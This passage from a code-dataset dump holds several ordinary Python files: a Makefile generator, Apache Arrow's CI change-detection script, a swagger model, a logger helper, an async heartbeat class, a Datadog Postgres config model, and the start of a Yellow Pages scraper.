+ \" \"\n Makefile = Makefile + \"EXTRA_DIST=%s\\n\\n\" % (EXTRA_DIST)\n noinst_PROGRAMS=\"\"\n for example in examples:\n noinst_PROGRAMS = noinst_PROGRAMS + example + \" \"\n Makefile = Makefile + \"noinst_PROGRAMS=%s\\n\\n\" % (noinst_PROGRAMS)\n for example in examples:\n Makefile = Makefile + \"%s_SOURCES=%s.c\\n%s_LDFLAGS=\\n%s_DEPENDENCIES= $(DEPS)\\n%s_LDADD= @RDL_LIBS@ $(LDADDS)\\n\\n\" % (example, example, example,\n\t example, example)\n Makefile = Makefile + \"valgrind: \\n\\t$(MAKE) CHECKER='valgrind' tests\\n\\n\"\n Makefile = Makefile + \"tests: $(noinst_PROGRAMS)\\n\"\n Makefile = Makefile + \"\\t@(echo '## examples regression tests')\\n\"\n Makefile = Makefile + \"\\t@(echo > .memdump)\\n\"\n for test in tests:\n Makefile = Makefile + \"\\t@($(CHECKER) %s)\\n\" % (test)\n Makefile = Makefile + '\\t@(grep \"MORY ALLO\" .memdump | grep -v \"MEMORY ALLOCATED : 0\" ; exit 0)\\n'\n Makefile = Makefile + \"\\n\\n\"\n try:\n\told = open(\"Makefile.am\", \"r\").read()\n\tif old != Makefile:\n\t n = open(\"Makefile.am\", \"w\").write(Makefile)\n\t print \"Updated Makefile.am\"\n except:\n print \"Failed to read or save Makefile.am\"\n #\n # Autogenerate the .cvsignore too ...\n #\n ignore = \"\"\".memdump\nMakefile.in\nMakefile\n\"\"\"\n for example in examples:\n ignore = ignore + \"%s\\n\" % (example)\n try:\n\told = open(\".cvsignore\", \"r\").read()\n\tif old != ignore:\n\t n = open(\".cvsignore\", \"w\").write(ignore)\n\t print \"Updated .cvsignore\"\n except:\n print \"Failed to read or save .cvsignore\"\n \nif __name__ == \"__main__\":\n load_api()\n output = open(\"examples.xml\", \"w\")\n output.write(\"<examples>\\n\")\n\n for file in glob.glob('*.c'):\n\tparse(file, output)\n\texamples.append(file[:-2])\n\n dump_symbols(output)\n dump_sections(output)\n output.write(\"</examples>\\n\")\n output.close()\n dump_Makefile()\n\n"} {"ext": "py", "sha": "1a30eb5f6102248048690b72aa1c08654e618e5e", "content": "# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. 
See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\nfrom __future__ import print_function\n\nimport functools\nimport os\nimport pprint\nimport re\nimport sys\nimport subprocess\n\n\nperr = functools.partial(print, file=sys.stderr)\n\n\ndef dump_env_vars(prefix, pattern=None):\n if pattern is not None:\n match = lambda s: re.search(pattern, s)\n else:\n match = lambda s: True\n for name in sorted(os.environ):\n if name.startswith(prefix) and match(name):\n perr(\"- {0}: {1!r}\".format(name, os.environ[name]))\n\n\ndef run_cmd(cmdline):\n proc = subprocess.Popen(cmdline,\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n out, err = proc.communicate()\n if proc.returncode != 0:\n raise RuntimeError(\"Command {cmdline} failed with code {returncode}, \"\n \"stderr was:\\n{stderr}\\n\"\n .format(cmdline=cmdline, returncode=proc.returncode,\n stderr=err.decode()))\n return out\n\n\ndef get_commit_description(commit):\n \"\"\"\n Return the textual description (title + body) of the given git commit.\n \"\"\"\n out = run_cmd([\"git\", \"show\", \"--no-patch\", \"--pretty=format:%B\",\n commit])\n return out.decode('utf-8', 'ignore')\n\n\ndef list_affected_files(commit_range):\n \"\"\"\n Return a list of files changed by the given git commit range.\n \"\"\"\n perr(\"Getting affected files from\", repr(commit_range))\n out = run_cmd([\"git\", \"diff\", \"--name-only\", commit_range])\n return list(filter(None, (s.strip() for s in out.decode().splitlines())))\n\n\ndef get_travis_head_commit():\n return os.environ['TRAVIS_COMMIT']\n\n\ndef get_travis_commit_range():\n if os.environ['TRAVIS_EVENT_TYPE'] == 'pull_request':\n # TRAVIS_COMMIT_RANGE is too pessimistic for PRs, as it may contain\n # unrelated changes. Instead, use the same strategy as on AppVeyor\n # below.\n run_cmd([\"git\", \"fetch\", \"-q\", \"origin\",\n \"+refs/heads/{0}\".format(os.environ['TRAVIS_BRANCH'])])\n merge_base = run_cmd([\"git\", \"merge-base\",\n \"HEAD\", \"FETCH_HEAD\"]).decode().strip()\n return \"{0}..HEAD\".format(merge_base)\n else:\n cr = os.environ['TRAVIS_COMMIT_RANGE']\n # See\n # https://github.com/travis-ci/travis-ci/issues/4596#issuecomment-139811122\n return cr.replace('...', '..')\n\n\ndef get_travis_commit_description():\n # Prefer this to get_commit_description(get_travis_head_commit()),\n # as rebasing or other repository events may make TRAVIS_COMMIT invalid\n # at the time we inspect it\n return os.environ['TRAVIS_COMMIT_MESSAGE']\n\n\ndef list_travis_affected_files():\n \"\"\"\n Return a list of files affected in the current Travis build.\n \"\"\"\n commit_range = get_travis_commit_range()\n try:\n return list_affected_files(commit_range)\n except RuntimeError:\n # TRAVIS_COMMIT_RANGE can contain invalid revisions when\n # building a branch (not a PR) after rebasing:\n # https://github.com/travis-ci/travis-ci/issues/2668\n if os.environ['TRAVIS_EVENT_TYPE'] == 'pull_request':\n raise\n # If it's a rebase, it's probably enough to use the last commit only\n commit_range = '{0}^..'.format(get_travis_head_commit())\n return list_affected_files(commit_range)\n\n\ndef list_appveyor_affected_files():\n \"\"\"\n Return a list of files affected in the current AppVeyor build.\n This only works for PR builds.\n \"\"\"\n # Re-fetch PR base branch (e.g. 
origin/master), pointing FETCH_HEAD to it\n run_cmd([\"git\", \"fetch\", \"-q\", \"origin\",\n \"+refs/heads/{0}\".format(os.environ['APPVEYOR_REPO_BRANCH'])])\n # Compute base changeset between FETCH_HEAD (PR base) and HEAD (PR head)\n merge_base = run_cmd([\"git\", \"merge-base\",\n \"HEAD\", \"FETCH_HEAD\"]).decode().strip()\n # Compute changes files between base changeset and HEAD\n return list_affected_files(\"{0}..HEAD\".format(merge_base))\n\n\nLANGUAGE_TOPICS = ['c_glib', 'cpp', 'docs', 'go', 'java', 'js', 'python',\n 'r', 'ruby', 'rust', 'csharp']\n\nALL_TOPICS = LANGUAGE_TOPICS + ['integration', 'site', 'dev']\n\n\nAFFECTED_DEPENDENCIES = {\n 'java': ['integration', 'python'],\n 'js': ['integration'],\n 'ci': ALL_TOPICS,\n 'cpp': ['python', 'c_glib', 'r', 'ruby', 'integration'],\n 'format': LANGUAGE_TOPICS,\n '.travis.yml': ALL_TOPICS,\n 'c_glib': ['ruby']\n}\n\nCOMPONENTS = {'cpp', 'java', 'c_glib', 'r', 'ruby', 'integration', 'js',\n 'rust', 'csharp', 'site', 'go', 'docs', 'python', 'dev'}\n\n\ndef get_affected_topics(affected_files):\n \"\"\"\n Return a dict of topics affected by the given files.\n Each dict value is True if affected, False otherwise.\n \"\"\"\n affected = dict.fromkeys(ALL_TOPICS, False)\n\n for path in affected_files:\n parts = []\n head = path\n while head:\n head, tail = os.path.split(head)\n parts.append(tail)\n parts.reverse()\n assert parts\n p = parts[0]\n fn = parts[-1]\n if fn.startswith('README'):\n continue\n\n if p in COMPONENTS:\n affected[p] = True\n\n _path_already_affected = {}\n\n def _affect_dependencies(component):\n if component in _path_already_affected:\n # For circular dependencies, terminate\n return\n for topic in AFFECTED_DEPENDENCIES.get(component, ()):\n affected[topic] = True\n _affect_dependencies(topic)\n _path_already_affected[topic] = True\n\n _affect_dependencies(p)\n\n return affected\n\n\ndef make_env_for_topics(affected):\n return {'ARROW_CI_{0}_AFFECTED'.format(k.upper()): '1' if v else '0'\n for k, v in affected.items()}\n\n\ndef get_unix_shell_eval(env):\n \"\"\"\n Return a shell-evalable string to setup some environment variables.\n \"\"\"\n return \"; \".join((\"export {0}='{1}'\".format(k, v)\n for k, v in env.items()))\n\n\ndef get_windows_shell_eval(env):\n \"\"\"\n Return a shell-evalable string to setup some environment variables.\n \"\"\"\n return \"\\n\".join(('set \"{0}={1}\"'.format(k, v)\n for k, v in env.items()))\n\n\ndef run_from_travis():\n perr(\"Environment variables (excerpt):\")\n dump_env_vars('TRAVIS_', '(BRANCH|COMMIT|PULL)')\n if (os.environ['TRAVIS_REPO_SLUG'] == 'apache/arrow' and\n os.environ['TRAVIS_BRANCH'] == 'master' and\n os.environ['TRAVIS_EVENT_TYPE'] != 'pull_request'):\n # Never skip anything on master builds in the official repository\n affected = dict.fromkeys(ALL_TOPICS, True)\n else:\n desc = get_travis_commit_description()\n if '[skip travis]' in desc:\n # Skip everything\n affected = dict.fromkeys(ALL_TOPICS, False)\n elif '[force ci]' in desc or '[force travis]' in desc:\n # Test everything\n affected = dict.fromkeys(ALL_TOPICS, True)\n else:\n # Test affected topics\n affected_files = list_travis_affected_files()\n perr(\"Affected files:\", affected_files)\n affected = get_affected_topics(affected_files)\n assert set(affected) <= set(ALL_TOPICS), affected\n\n perr(\"Affected topics:\")\n perr(pprint.pformat(affected))\n return get_unix_shell_eval(make_env_for_topics(affected))\n\n\ndef run_from_appveyor():\n perr(\"Environment variables (excerpt):\")\n 
dump_env_vars('APPVEYOR_', '(PULL|REPO)')\n if not os.environ.get('APPVEYOR_PULL_REQUEST_HEAD_COMMIT'):\n # Not a PR build, test everything\n affected = dict.fromkeys(ALL_TOPICS, True)\n else:\n affected_files = list_appveyor_affected_files()\n perr(\"Affected files:\", affected_files)\n affected = get_affected_topics(affected_files)\n assert set(affected) <= set(ALL_TOPICS), affected\n\n perr(\"Affected topics:\")\n perr(pprint.pformat(affected))\n return get_windows_shell_eval(make_env_for_topics(affected))\n\n\ndef test_get_affected_topics():\n affected_topics = get_affected_topics(['cpp/CMakeLists.txt'])\n assert affected_topics == {\n 'c_glib': True,\n 'cpp': True,\n 'docs': False,\n 'go': False,\n 'java': False,\n 'js': False,\n 'python': True,\n 'r': True,\n 'ruby': True,\n 'rust': False,\n 'csharp': False,\n 'integration': True,\n 'site': False,\n 'dev': False\n }\n\n affected_topics = get_affected_topics(['format/Schema.fbs'])\n assert affected_topics == {\n 'c_glib': True,\n 'cpp': True,\n 'docs': True,\n 'go': True,\n 'java': True,\n 'js': True,\n 'python': True,\n 'r': True,\n 'ruby': True,\n 'rust': True,\n 'csharp': True,\n 'integration': True,\n 'site': False,\n 'dev': False\n }\n\n\nif __name__ == \"__main__\":\n # This script should have its output evaluated by a shell,\n # e.g. \"eval `python ci/detect-changes.py`\"\n if os.environ.get('TRAVIS'):\n try:\n print(run_from_travis())\n except Exception:\n # Make sure the enclosing eval will return an error\n print(\"exit 1\")\n raise\n elif os.environ.get('APPVEYOR'):\n try:\n print(run_from_appveyor())\n except Exception:\n print(\"exit 1\")\n raise\n else:\n sys.exit(\"Script must be run under Travis-CI or AppVeyor\")\n"} {"ext": "py", "sha": "1a30ed830b6ac8e84a7afbb611f1e85fd85aad12", "content": "# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom biocontainers_flask.server.models.base_model_ import Model\nfrom biocontainers_flask.server import util\n\n\nclass Checksum(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n def __init__(self, checksum: str=None, type: str=None): # noqa: E501\n \"\"\"Checksum - a model defined in Swagger\n\n :param checksum: The checksum of this Checksum. # noqa: E501\n :type checksum: str\n :param type: The type of this Checksum. # noqa: E501\n :type type: str\n \"\"\"\n self.swagger_types = {\n 'checksum': str,\n 'type': str\n }\n\n self.attribute_map = {\n 'checksum': 'checksum',\n 'type': 'type'\n }\n self._checksum = checksum\n self._type = type\n\n @classmethod\n def from_dict(cls, dikt) -> 'Checksum':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The Checksum of this Checksum. # noqa: E501\n :rtype: Checksum\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def checksum(self) -> str:\n \"\"\"Gets the checksum of this Checksum.\n\n The hex-string encoded checksum for the data. # noqa: E501\n\n :return: The checksum of this Checksum.\n :rtype: str\n \"\"\"\n return self._checksum\n\n @checksum.setter\n def checksum(self, checksum: str):\n \"\"\"Sets the checksum of this Checksum.\n\n The hex-string encoded checksum for the data. 
# noqa: E501\n\n :param checksum: The checksum of this Checksum.\n :type checksum: str\n \"\"\"\n if checksum is None:\n raise ValueError(\"Invalid value for `checksum`, must not be `None`\") # noqa: E501\n\n self._checksum = checksum\n\n @property\n def type(self) -> str:\n \"\"\"Gets the type of this Checksum.\n\n The digest method used to create the checksum. The value (e.g. `sha-256`) SHOULD be listed as `Hash Name String` in the https://github.com/ga4gh-discovery/ga4gh-checksum/blob/master/hash-alg.csv[GA4GH Checksum Hash Algorithm Registry]. Other values MAY be used, as long as implementors are aware of the issues discussed in https://tools.ietf.org/html/rfc6920#section-9.4[RFC6920]. GA4GH may provide more explicit guidance for use of non-IANA-registered algorithms in the future. # noqa: E501\n\n :return: The type of this Checksum.\n :rtype: str\n \"\"\"\n return self._type\n\n @type.setter\n def type(self, type: str):\n \"\"\"Sets the type of this Checksum.\n\n The digest method used to create the checksum. The value (e.g. `sha-256`) SHOULD be listed as `Hash Name String` in the https://github.com/ga4gh-discovery/ga4gh-checksum/blob/master/hash-alg.csv[GA4GH Checksum Hash Algorithm Registry]. Other values MAY be used, as long as implementors are aware of the issues discussed in https://tools.ietf.org/html/rfc6920#section-9.4[RFC6920]. GA4GH may provide more explicit guidance for use of non-IANA-registered algorithms in the future. # noqa: E501\n\n :param type: The type of this Checksum.\n :type type: str\n \"\"\"\n if type is None:\n raise ValueError(\"Invalid value for `type`, must not be `None`\") # noqa: E501\n\n self._type = type\n"} {"ext": "py", "sha": "1a30ee20ff75f166ba6f3f1669d8414f9ffd9869", "content": "from .config import UTILS1_LOGLEVEL\nimport logging\nfrom log_utils.utils import get_logger_with_file_handler\n\nformatter = 'logger name : %(name)s ,%(levelname)s , func : %(funcName)s , %(message)s , module : %(module)s ,line : %(lineno)d , %(asctime)s'\nlogger = get_logger_with_file_handler(__name__,UTILS1_LOGLEVEL,formatter)\nstream_handler = logging.StreamHandler()\nlogger.addHandler(stream_handler)\n\n\ndef add(num1 : float,num2 : float)->float:\n logger.warning(f'args : {num1} , {num2}')\n return num1+num2"} {"ext": "py", "sha": "1a30f0555ab7f6904a9b7f6b36c59c9a49211b1a", "content": "import asyncio\nimport contextlib\nfrom types import TracebackType\nfrom typing import Optional, Type, Dict, Any\n\nimport aiojobs\nfrom aiojobs import Scheduler\n\nfrom .client import ChaosIQClient\nfrom .log import logger\nfrom .types import Config\n\n\n__all__ = [\"Heartbeat\"]\n\n\nclass Heartbeat:\n def __init__(self, config: Config) -> None:\n self.sched: Scheduler = None\n self.config = config\n self._running = False\n self.aiojob = None\n\n async def __aenter__(self) -> 'Heartbeat':\n await self.setup()\n return self\n\n async def __aexit__(self, exc_type: Optional[Type[BaseException]],\n exc_value: Optional[BaseException],\n traceback: Optional[TracebackType]) -> None:\n await self.cleanup()\n\n @property\n def running(self) -> bool:\n \"\"\"\n Flag that is set when the heartbeat is active.\n \"\"\"\n return self._running\n\n async def setup(self) -> None:\n \"\"\"\n Create the underlying scheduler to periodically send the heartbeat.\n \"\"\"\n logger.info(\"Creating heartbeat loop\")\n self.sched = await asyncio.wait_for(\n aiojobs.create_scheduler(\n exception_handler=self.aiojobs_exception), None)\n\n period = self.config.heartbeat_interval\n if not period:\n 
logger.critical(f\"Heartbeat is not properly configured; \"\n f\"interval '{period}' is not valid\")\n return\n\n logger.info(\"Spawning the heartbeat...\")\n self.aiojob = await self.sched.spawn(self.send_pulse())\n\n async def cleanup(self) -> None:\n \"\"\"\n Gracefully terminate the scheduler.\n \"\"\"\n if self.aiojob:\n logger.info(\"Stopping heartbeat pulse...\")\n await self.aiojob.close()\n\n if not self.sched.closed:\n logger.info(\"Closing heartbeat loop\")\n await asyncio.wait_for(self.sched.close(), None)\n\n self._running = False\n\n async def send_pulse(self) -> None:\n \"\"\"\n Sends its heartbeat periodically to the console\n\n This must be interrupted instantly and not until wait is complete !!\n We can NOT wait for end of iddle before leaving the loop\n \"\"\"\n self._running = True\n wait = self.config.heartbeat_interval\n logger.info(f\"Sending heartbeat every {wait} seconds\")\n\n while self._running and not self.sched.closed:\n await asyncio.sleep(wait)\n\n with contextlib.suppress(Exception):\n async with ChaosIQClient(self.config) as client:\n await client.post(\n \"/agent/actions\", json={\"action\": \"heartbeat\"})\n\n @staticmethod\n def aiojobs_exception(\n scheduler: Scheduler,\n context: Dict[str, Any]) -> None: # pragma: no cover\n logger.error(context)\n"} {"ext": "py", "sha": "1a30f0602c7f03d5176c176c9d096e25d9ea9968", "content": "# (C) Datadog, Inc. 2021-present\n# All rights reserved\n# Licensed under a 3-clause BSD style license (see LICENSE)\n\n# This file is autogenerated.\n# To change this file you should edit assets/configuration/spec.yaml and then run the following commands:\n# ddev -x validate config -s <INTEGRATION_NAME>\n# ddev -x validate models -s <INTEGRATION_NAME>\n\nfrom __future__ import annotations\n\nfrom typing import Any, Mapping, Optional, Sequence, Union\n\nfrom pydantic import BaseModel, root_validator, validator\n\nfrom datadog_checks.base.utils.functions import identity\nfrom datadog_checks.base.utils.models import validation\n\nfrom . 
import defaults, validators\n\n\nclass ObfuscatorOptions(BaseModel):\n class Config:\n allow_mutation = False\n\n collect_commands: Optional[bool]\n collect_comments: Optional[bool]\n collect_metadata: Optional[bool]\n collect_tables: Optional[bool]\n replace_digits: Optional[bool]\n\n\nclass QueryActivity(BaseModel):\n class Config:\n allow_mutation = False\n\n collection_interval: Optional[float]\n enabled: Optional[bool]\n payload_row_limit: Optional[float]\n\n\nclass QueryMetrics(BaseModel):\n class Config:\n allow_mutation = False\n\n collection_interval: Optional[float]\n enabled: Optional[bool]\n\n\nclass QuerySamples(BaseModel):\n class Config:\n allow_mutation = False\n\n collection_interval: Optional[float]\n enabled: Optional[bool]\n explain_function: Optional[str]\n explained_queries_cache_maxsize: Optional[int]\n explained_queries_per_hour_per_query: Optional[int]\n samples_per_hour_per_query: Optional[int]\n seen_samples_cache_maxsize: Optional[int]\n\n\nclass Relation(BaseModel):\n class Config:\n allow_mutation = False\n\n relation_name: Optional[str]\n relation_regex: Optional[str]\n relation_schema: Optional[str]\n relkind: Optional[Sequence[str]]\n schemas: Optional[Sequence[str]]\n\n\nclass InstanceConfig(BaseModel):\n class Config:\n allow_mutation = False\n\n application_name: Optional[str]\n collect_activity_metrics: Optional[bool]\n collect_bloat_metrics: Optional[bool]\n collect_count_metrics: Optional[bool]\n collect_database_size_metrics: Optional[bool]\n collect_default_database: Optional[bool]\n collect_function_metrics: Optional[bool]\n collect_wal_metrics: Optional[bool]\n custom_queries: Optional[Sequence[Mapping[str, Any]]]\n data_directory: Optional[str]\n dbm: Optional[bool]\n dbname: Optional[str]\n dbstrict: Optional[bool]\n disable_generic_tags: Optional[bool]\n empty_default_hostname: Optional[bool]\n host: str\n ignore_databases: Optional[Sequence[str]]\n max_relations: Optional[int]\n min_collection_interval: Optional[float]\n obfuscator_options: Optional[ObfuscatorOptions]\n password: Optional[str]\n pg_stat_statements_view: Optional[str]\n port: Optional[int]\n query_activity: Optional[QueryActivity]\n query_metrics: Optional[QueryMetrics]\n query_samples: Optional[QuerySamples]\n query_timeout: Optional[int]\n relations: Optional[Sequence[Union[str, Relation]]]\n reported_hostname: Optional[str]\n service: Optional[str]\n ssl: Optional[str]\n ssl_cert: Optional[str]\n ssl_key: Optional[str]\n ssl_password: Optional[str]\n ssl_root_cert: Optional[str]\n table_count_limit: Optional[int]\n tag_replication_role: Optional[bool]\n tags: Optional[Sequence[str]]\n username: str\n\n @root_validator(pre=True)\n def _initial_validation(cls, values):\n return validation.core.initialize_config(getattr(validators, 'initialize_instance', identity)(values))\n\n @validator('*', pre=True, always=True)\n def _ensure_defaults(cls, v, field):\n if v is not None or field.required:\n return v\n\n return getattr(defaults, f'instance_{field.name}')(field, v)\n\n @validator('*')\n def _run_validations(cls, v, field):\n if not v:\n return v\n\n return getattr(validators, f'instance_{field.name}', identity)(v, field=field)\n\n @root_validator(pre=False)\n def _final_validation(cls, values):\n return validation.core.finalize_config(getattr(validators, 'finalize_instance', identity)(values))\n"} {"ext": "py", "sha": "1a30f0d9cda97bfc18e9641607afe1ecb74c6d95", "content": "# Kendall Jackson MIT License\n\n# GetScraped Private v1\n\n#parse_listing from 
https://github.com/scrapehero/yellowpages-scraper\n\n#!/usr/bin/env python\n\n# -*- coding: utf-8 -*-\n\nimport requests\n\nfrom lxml import html\n\nimport unicodecsv as csv\n\n#import argparse\n\nfinal_list = []\n\nstate = 'AZ'\n\ncategories = ['Abrasive Dealers','Abundant Life Churches','AC Repairs','Accommodation','Acupuncture','Adhesive','Adoption Centres','Adventure Clubs','Advertising','Advertising Agencies','Advocates','Aerobics','Aeronautical Engineering Colleges','Air And Train Ambulance Services','Air Cargo Agents','Air Conditioners','Air Coolers','Air Hostess Training Institutes','Air Pollution Control Equipment Dealers','Alliance Churches','Alloy, Iron & Steel Industries','Alternative Fuels Stations','Alternative Medicines','Aluminium Extrusion Industry','Ambulance Services','Ammonia Gas Dealers','Amusement Parks','Anglican Churches','Animation Training Institutes','Apostolic Churches','Apparels & Accessories','Apple Product Repair','Aquarium','Architects','Area Rugs & Mats','Armenian Churches','Arms & Ammunition Dealer','Arms And Ammunitions','Art Gallery','Art Paintings','Artificial Grass','Artificial Turf','Arts & Craft Classes','Astrologers','ATM Centres','Audio Video Systems','Auditoriums','Auto Dealers','Auto Service Centres','Automobile Engine Oil Dealers','Automobiles','Aviation Academies','Ayurvedic Food','Ayurvedic Medicines','Ayurvedic Treatment','B 2 B','B Pharmacy Colleges','B.Ed. Colleges','Baby Foods','Baby Store','Bakeries','Bakery Equipments','Balloon Decorations','Bamboo Flooring','Bangles','Banks','Banquet Halls','Baptist Churches','Bar Coding Machine Dealer','Bars','Bathroom Linen','Battery Dealers','BDS Colleges','Bean Bags','Beautician Training Institutes','Beauty & Wellness','Beauty And Cosmetic Products','Beauty Parlours','Bed Linen','Bed Room Furniture','Beef Shops','Belts & Wallets','Bicycle Stores','Bike Rentals','Billing Machine Dealers','Binding','Binoculars & Telescope','Birth Certificate Offices','Blocks Material','Blood Donation Centres','Blow Moulding Machine Dealer','Body Massage Parlours','Boilers','Book Publishers','Books Stores','Bore Well Drilling','Boutiques','Bowling','Brick Materials','Bridal Makeup','Budget Hotels','Building and Construction','Building Demolition','Building Materials','Bulk SMS Modems','Bulk Sms Services','Burqa Retailers','Business Cards','Business Consultants','Business Hotels','CA & ICWA Training Institutes','Cable Manufacturers','Cable Tv Operators','Cabs Services','Cafes','Cake Shops','Calvary Chapel Churches','Camera Accessories','Camera Lens','Cameras','Candles','Caps & Hats','Car Ac Repairs','Car Accessories','Car Dealers','Car Rentals','Car Repairs & Services','Carbon Dioxide Gas Dealers','Cargo & Logistics','Cargo Agents','Carpenters','Carpet & Rugs','Carpet And Carpet Tiles','Casual Dining','Catering Services','Catholic Churches','CBSC Schools','Cement Materials','Central Government Offices','Centreing Materials','Chairs','Chandeliers','Charitable Trusts','Chartered Accountants','Chartered Bus','Chat & Snacks','Chicken Shops','Children Wear','Childrens Hospitals','Chimneys','Snacks','Chit Funds','Chocolate Shops','Churches','Cinema Theaters','Citric Acid Dealers','City Clerk Offices','City Government Offices','Civil Contractors','Cleaning Tools & Accessories','Clinics','Clocks','Cloud Software','Clubs','CNG Pump Stations','Coarse Aggregates','Commercial Kitchen Equipment Dealers','Communication','Competitive Exams','Computer Accessories & Peripherals','Computers','Computers, Tablets & Mobiles','Conference 
Hall','Construction & Renovation','Construction Companies','Consultants','Contact Lenses','Content Writers','Contractors','Convention Centres','Cooking Classes','Cooks On Hire','Cooktops','Cookware','Corporate Catering Services','Corporate Gifts','Cosmetic Surgery','Couriers','Courts','CPAP & BIPAP Systems','Crackers','Crane Services','Cremation Grounds','Cremation Services','Curtain Accessories','Cushion & Cushion Covers','Cutlery','Dance Academies','Dead Body Freezer Box On Hire','Decor & Lightings','Decor & Show Pieces','Decoration Materials','Degree Colleges','Dental Clinics','Designing & Wood Carving','Detective Agencies','Dhaba','Diagnostic Centres','Diesel Gas Stations','Dietician','Digital Cameras','Digital Printers','Digital Weighing Scale Dealers','Dining','Dining Room Furniture','Dining Sets','Disc Jockey Training Institutes','Dishwasher','Diwan Sets','Doctors','Dog Training','Doors, Windows & Partitions','Drama Theaters','Dress Materials','Drilling Equipments','Driver Service Agents','Dry Fruits','Dry Ice Dealer','DSLR Cameras','DTP Services','Dvd & Vcd','Eastern Orthodox Churches','Education','Education Colleges','Education Consultants','Education Councils & Board Offices','Education Schools','Egg Shops','Electrical Contractors','Electrical Sub-Stations','Electrical Suppliers','Electricians','Electronic Accessories','Electronic Display Boards Manufacturer','Electronic Weighing Scale Dealers','Electronics','Elevators','Email Marketing','Embroidery Works','Emergency Services','Engineering Colleges','ENT Hospitals','Entrance Exams Coaching Centres','Establishments','Ethnic Wear','Evangelical Churches','Event Decorators','Event Management','Event Organizers','Event Venues','Events Catering Services','Excavation','Eye Hospitals','Eyeglasses','Fabrication & Welding Works','False Ceiling','Family Clubs','Fans','Farm Houses','Fashion Designers','Fashion Designing Training Institutes','Fast Food Centre','Fertility & Infertility Clinics','Fertilizer & Soil','Film And Television Institute Of India','Film Studios','Financial Planners','Financial Services','Fine Dining','Fire Alarms','Fire And Safety Course Training','Fire Extinguishers','Fire Protection Systems','Fire Safety Equipments','Fire Stations','Fish & Sea Food Shops','Fitness Centres','Flex Printing Services','Flooring','Flooring Installations','Flooring Tools & Materials','Florists','Flower Decorations','Food & Beverage Outlets','Food & Beverages','Food Courts','Food Machinery Manufacturer','Food Processing Equipment Manufacturer','Food Stores','Footwear','Foreign Exchange','Foursquare Churches','Frames','Fruit Juice Processing Machine Manufacture','Fruits','Full Gospel Churches','Function Halls','Funeral Band','Funeral Materials','Furnishings','Furniture','Furniture on Hire','Furniture Storage','Gaming Centres','Gardening Tools','Garments','Gas Dealers','Gas Stations','Gemological Institute Of India','General Hospitals','General order suppliers','General Pharmacies','GI Pipe Dealer','Gifts And Novelties','Glass Fitting Hardware','Glasswares','Go Karting','Goldsmiths','Gospel Churches','Government Hospitals','Government Offices','Graphic Designers','GRE & TOEFL Coaching Centres','Greek Orthodox Churches','Groceries','Groundwater Surveyors','Guest Houses','Gurudwaras','Water Heater Repair','Gymnasium','Gymnasium Equipments','Hair Fall Treatments','Hair Stylists','Hair Transplantation','Hair Treatments','Hall Decorations','Handicraft Items','Handlooms','Hardware And Network Training Institutes','Hardware And Networking','Hardware 
Stores','Hardware Tools','Hardwood Flooring','HD Cameras','Health','Health Clubs','Hearse Services','Heavy Vehicle Dealers','Helmet Dealers','Hispanic Churches','Home Appliances','Home Builders','Home Delivery Restaurants','Home Furniture','Home Needs','Home Theater Systems','Homeopathy Clinics','Homeopathy Medicines','Hosiery Store','Hospitals','Hotels','House Painters','Housekeeping Services','Hr Consultancies','Hydraulic & Pulley Equipment Dealers','Hydrochloric Acid Dealers','Hypermarkets','IB Schools','Ice Cream & Dessert Parlors','ICSE Schools','IGCSE Schools','Immigration Consultants','Income Tax Offices','Industrial Bearing Dealers','Industrial Belt Dealers','Industrial Burner Dealers','Industrial Chemical Dealers','Industrial Electronic Components Dealers','Industrial Equipments','Industrial Fan Dealers','Industrial Fire Extinguisher Dealers','industrial machine dealers','Industrial Safety Equipment Dealers','Industrial Spring Dealers','Industrial Trolleys Manufacturer','Innerwear And Loungewear','Institute Of Hotel Management','Insurance Agents','Interior Design Courses','Interior Designers','Internet Service Providers','Inverters','Investment Advisors','Irrigation Equipment Dealers','ITI Training','Jain Temples','Jeans','Jewellery','Jewellery Box Manufacturers','Journalism Training Institutes','Juice Centre','Junior Colleges','Kalyana Mandapam','Kennels','Kitchen & Dining','Kitchen Storage Containers','Lab Equipment And Chemical Suppliers','Labor Contractors','Laboratories','Ladies Bags & Purses','Ladies Dresses','Laminate Flooring','Language Training Institutes','Laptop Repair','Laptops','Lathe Machine Dealers','Laundry Services','Law Colleges','Lawn & Garden','Leather Goods Manufacturer','Legal & Financial Services','Legal Services','Libraries','Lifestyle Accessories','Lightings','Living Room Furniture','Loan Agencies','Loan Agents','Local Government Offices','Locks','Lodges','Logistic Companies','Logistics Services','Lounges','Luxury Hotels','Maggam Job Works','Makeup Artists','Manufacturer of Power Generators','Marriage Bureaus','Marriage Halls','Mass Communication & Journalism Colleges','Matching Centres','Maternity Hospitals','Mattresses','Meat & Poultry Shops','Media Advertising','Medical Coding Training Institutes','Medical Colleges','Medical Equipments','Medical Stockings','Meditation Centres','Mehandi Artists','Mennonite Churches','Mens Hostels','Mesh Dealers','Metal Industries','Methodist Churches','Metro Rail Stations','Microbreweries','Microwave Repairs','Military Recruiting Offices','Milk & Milk Products','Mineral Water Suppliers','Mobile Phones','Mobile Repairs','Mobile Repairs','Modular Furniture','Modular Kitchen Dealers','Money Transfer Agencies','Montessori Training Institutes','Moravian Churches','Morgues Services','Mormon Churches','Mosques','Motor Driving Schools','Mould Dies Manufacturer','Moving Media Ads','Mp3 Players','MS Pipe Dealer','Multispecialty Hospitals','Museums','Music Academies','Musical Instruments','Mutton Shops','Natural Flooring','Nature Cure Centers','Naturopathy','Network Securities','Networking Devices','New Age Churches','Newspaper Ads','NGO Clubs','NGOs & Social Service Organisations','Night Clubs','Night Life','Night Wears','Nitric Acid Dealers','Notary 